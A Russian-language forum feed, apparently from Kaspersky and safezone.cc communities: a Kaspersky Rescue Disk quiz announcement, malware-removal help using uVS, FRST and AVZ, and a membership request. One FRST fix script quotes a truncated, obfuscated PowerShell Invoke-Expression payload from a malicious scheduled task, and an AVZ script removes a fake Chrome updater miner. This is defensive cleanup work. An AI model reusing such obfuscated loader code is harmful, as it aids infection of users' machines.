Лидеры

Друзья, 17 декабря 2024 года опубликовано бесплатное решение для проверки компьютеров и лечения обнаруженных угроз без загрузки операционной системы - Kaspersky Rescue Disk 2024. Это решение позволяет эффективно выявлять и устранять вредоносные программы, работая с USB-носителя или DVD-диска. В её состав входит приложение Kaspersky Rescue Tool, а также дополнительные инструменты, такие как файловый менеджер, браузер и терминал. Предлагаем Вам подробнее ознакомиться с Kaspersky Rescue Disk 2024, ответив на вопросы нашей викторины. Удачи! 🎉 НАГРАЖДЕНИЕ Без ошибок — 1200 баллов Одна ошибка — 1000 баллов Две ошибки — 800 баллов ПРАВИЛА ПРОВЕДЕНИЯ Викторина проводится до 20:00 02.04.2025 года (время московское). Правильные ответы будут опубликованы не позднее 10 дней с момента окончания викторины. Публичное обсуждение вопросов и ответов викторины запрещено. Итоги будут подведены в течение десяти дней с момента публикации правильных ответов. Баллы будут начислены в течение двадцати дней с момента опубликования итогов викторины. Все вопросы, связанные с корректностью проведения викторины, необходимо отправлять пользователю @kmscom (пользователей @Friend и @Elly включать в копию адресатов) через систему личных сообщений с подробным описанием ситуации. Вопросы по викторине принимаются только через личные сообщения в течение срока проведения викторины и не позднее трёх дней после публикации ответов (время московское). Ответ будет дан в рамках созданной переписки, коллегиальным решением организаторов викторины и дальнейшего обсуждения не предполагает. Администрация, официально уведомив, может в любой момент внести изменения в правила викторины, перезапустить или вовсе прекратить её проведение, а также отказать участнику в получении приза, применить иные меры (вплоть до блокировки аккаунта) в случае выявления фактов его недобросовестного участия в ней и/или нарушения правил викторины, передачи ответов на викторину иным участникам. При ответе на вопросы викторины запрещается использовать анонимайзеры и другие технические средства для намеренного сокрытия реального IP-адреса. Вопросы по начислению баллов направлять пользователю@Ellyчерез систему личных сообщений в течение 30 дней с момента подведения итогов викторины. Викторина является собственностью клуба «Лаборатории Касперского», её использование на сторонних ресурсах без разрешения администрации клуба запрещено. Участие в викторине означает безоговорочное согласие с настоящими правилами. Для перехода к вопросам викторины нажмите ЗДЕСЬ.

Хорошо, я проверю новые логи чуть позже в течение дня, сейчас у меня еще утро ранее и пока еще не наступила фаза "утро вечера мудренее", и надо немного отдохнуть, пока Солнце взойдет.

Друзья! Публикуем верные ответы на все вопросы викторины. Благодарим за активное участие и поздравляем всех победителей!👍

На данный момент - самостоятельно, т.е. в ручном режиме из наших информационных каналов. В т.ч. на наших форумах появится информация о тестировании бета-релиза новой версии.

Да, dll что рядом с updater.exe удалите вручную, сама она уже не запустится. Переводим дух, и по возможности обновите ПО: Microsoft Office профессиональный плюс 2013 - ru-ru v.15.0.5603.1000 Данная программа больше не поддерживается разработчиком. Обновите Microsoft Office до последней версии или используйте Office Online или LibreOffice WinRAR 5.60 v.5.60 Внимание! Скачать обновления Telegram Desktop v.5.5.5 Внимание! Скачать обновления Adobe Acrobat Reader DC MUI v.20.009.20065 Внимание! Скачать обновления ^Проверьте обновления через меню Справка - Проверить обновления!^ ------------------------------- [ Browser ] ------------------------------- Chromium-Gost v.120.0.6099.129 Внимание! Скачать обновления Yandex v.23.3.0.2246 Внимание! Скачать обновления ^Проверьте обновления через меню Дополнительно - О браузере Yandex!^

судя по логу uVS зловред должен быть удален. Изменено/удалено объектов автозапуска 1 из 1 Удалено файлов: 1 из 1 В логах FRST его нет. --------- Если других вопросов или проблем в работе системы не осталось: завершающие шаги: Загрузите SecurityCheck by glax24 & Severnyj, https://safezone.cc/resources/security-check-by-glax24.25/ сохраните утилиту на Рабочем столе и извлеките из архива. Запустите из меню по щелчку правой кнопки мыши Запустить от имени администратора Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt Прикрепите этот файл к своему следующему сообщению.

Вопрос по данному детекту снимается. Разобрались, что в системе был активен вирус Delf*/DarkKomet*, который заражал запускаемые исполняемые файлы, в том числе и RakhniDecryptor.exe, который пользователь скачал для расшифровки файлов после шифрования PROTON-ом.

Поработайте некоторое время, если вирусные проблемы обнаружатся, напишите в данной теме. Если необходимо будет восстановление безопасного режима, или установка антивируса, напишите в раздел Компьютерной помощи,

Создайте в uVS дополнительно образ автозапуска. 1. Скачайте архив с актуальной версией утилиты uVS c зеркала программы отсюда (1) (здесь дополнительно встроен архиватор 7zip), распакуйте данный архив с программой в отдельный каталог. 2. запустите из каталога с модулями uVS файл Start.exe (для Vista, W7- W11 выберите запуск от имени Администратора) 3. В стартовом окне программы - нажать "запустить под текущим пользователем". (если текущий пользователь с правами локального администратора) 3.1 Если запросили обычный образ автозапуска, переходим сразу к п.4 Если запросили образ автозапуска с отслеживанием процессов и задач: В главном меню выбираем "Дополнительно" - Твики" - нажимаем "твик 39" и перегружаем систему. После перезагрузки переходим к п.2 и выполняем все действия из 2, 3, 4, 5, 6. (без 3.1) 4. Далее, меню "Файл" / Сохранить Полный образ автозапуска. 5. Дождитесь, пока процесс создания файла образа завершится. Сохраненный файл образа автозапуска (с именем Ваш_компьютер_дата_время*.txt) автоматически добавится в архив 7z. (если используется uVS из зеркала со встроенным архиватором 7z) 6. Файл архива с образом автозапуска прикрепите к вашему сообщению на форуме.

Очистите отчеты антивируса с найденными угрозами, запустите полную проверку антивирусом и сообщите результат.

откуда такой вывод? Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе. Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе. 1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением. 2. Убедитесь, что в окне Optional Scan (Дополнительные опции) отмечены List BCD и 90 Days Files. 3. Нажмите кнопку Scan (Сканировать). 4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. 5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt). 6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.

Отключите до перезагрузки антивирус. Выделите следующий код: Start:: CloseProcesses: SystemRestore: On CreateRestorePoint: Task: {36D0A3F9-EFDA-4430-9646-7D7EC6308F49} - System32\Tasks\$nya-CcVuc329 => C:\Windows\system32\cmd.exe [339968 2025-03-12] (Microsoft Windows -> Microsoft Corporation) -> /C echo function mXiJ($ocUH){ Invoke-Expression -Debug -InformationAction Ignore '$Bwqa=ie[ieSyiestieemie.Sieeiecieuierieiietyie.ieCierieyiepietoiegierieaiepiehiey.ieAieeiesie]:ie:ieCierieeieatieeie(ie);'.Replace('ie', ''); Invoke-Expression -Debug -Verbose -WarningAction Inquire -InformationAction (запись имеет ещё 3541 символов). <==== ВНИМАНИЕ FirewallRules: [{DD1CE507-77A0-4C90-BBB4-4F4468856A14}] => (Allow) C:\Users\piggy\MediaGet2\mediaget.exe => Нет файла FirewallRules: [{6A5DAEB1-DEE7-47AE-A319-76EC3E56588C}] => (Allow) C:\Users\piggy\MediaGet2\mediaget.exe => Нет файла FirewallRules: [{6B9FD7B8-B9FA-4513-B3C9-27DB457F5857}] => (Allow) C:\Users\piggy\MediaGet2\QtWebEngineProcess.exe => Нет файла FirewallRules: [{EF9D1807-7C8F-4DF3-8BA7-D59544D53B89}] => (Allow) C:\Users\piggy\MediaGet2\QtWebEngineProcess.exe => Нет файла Reboot: End:: Скопируйте выделенный текст (правой кнопкой - Копировать). Запустите FRST (FRST64) от имени администратора. Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению. Компьютер будет перезагружен автоматически. Подробнее читайте в этом руководстве. После этого проверьте ещё раз антивирусом Касперского.

халява бесследно не проходит, вот и цепляют майнера. Здравствуйте. Загрузитесь в безопасном режиме. Запустите AVZ из папки Autologger от имени Администратора по правой кнопке мыши. Выполните скрипт в AVZ (Файл – Выполнить скрипт – вставить текст скрипта из окна Код) begin ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.'); ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); if not IsWOW64 then begin SearchRootkit(true, true); SetAVZGuardStatus(True); end; QuarantineFile('C:\ProgramData\Google\Chrome\updater.exe',''); SetServiceStart('GoogleUpdateTaskMachineQC', 4); DeleteService('GoogleUpdateTaskMachineQC'); DeleteFile('C:\ProgramData\Google\Chrome\updater.exe','64'); BC_ImportAll; ExecuteSysClean; BC_Activate; RebootWindows(false); end. Обратите внимание: будет выполнена перезагрузка компьютера. Загрузитесь в нормальном режиме. Выполните скрипт в AVZ begin DeleteFile(GetAVZDirectory+'quarantine.7z'); ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine ./Quarantine/', 1, 0, true); end.Отправьте quarantine.7z из папки с распакованной утилитой AVZ с помощью формы отправки карантина или на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: malware в теле письма. Пожалуйста, ЕЩЕ РАЗ запустите Autologger; прикрепите к следующему сообщению НОВЫЕ логи.

из новостей разумеется )

Прошу принять меня в группу Старожилы. В группе Активисты состою с 21.11.2024 (ссылка на сообщение Администратора о приёме в группу), с момента вступления прошло более 4 месяцев. Количество сообщений: 1 097 из 500 необходимых. Репутация: 159 из 150 необходимых. Непогашенные предупреждения, отмеченные в Центре предупреждений, за последние 6 месяцев отсутствуют. Дата регистрации 20.02.2007, с момента регистрации прошло более 1 года.